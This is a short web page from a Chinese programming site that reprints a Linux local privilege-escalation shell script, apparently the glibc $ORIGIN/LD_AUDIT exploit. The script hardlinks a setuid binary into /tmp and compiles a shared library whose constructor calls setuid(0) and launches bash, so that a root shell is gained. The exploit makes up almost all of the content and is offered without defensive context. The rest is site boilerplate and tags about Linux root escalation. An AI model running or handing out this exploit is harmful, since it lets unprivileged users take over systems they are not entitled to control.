#!/bin/sh unset LD_AUDIT rm -r -f /tmp/exploit mkdir /tmp/exploit ln /bin/ping /tmp/exploit/target exec 3< /tmp/exploit/target ls -l /proc/$$/fd/3 rm -rf /tmp/exploit ls -l /proc/$$/fd/3 cat > program.c << _EOF void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); } _EOF gcc -w -fPIC -shared -o /tmp/exploit program.c LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 unset LD_AUDIT
查看本栏目更多精彩内容:http://www.bianceng.cnhttp://www.bianceng.cn/OS/Linux/
以上是小编为您精心准备的的内容,在的博客、问答、公众号、人物、课程等栏目也有的相关内容,欢迎继续使用右上角搜索按钮进行搜索脚本
, exploit
, target
, proc
, tmp
Bin
linux 自动提权脚本、linux 提权脚本、linux普通用户提权、linux root提权、linux mysql root提权,以便于您获取更多的相关知识。
时间: 2024-10-27 01:03:34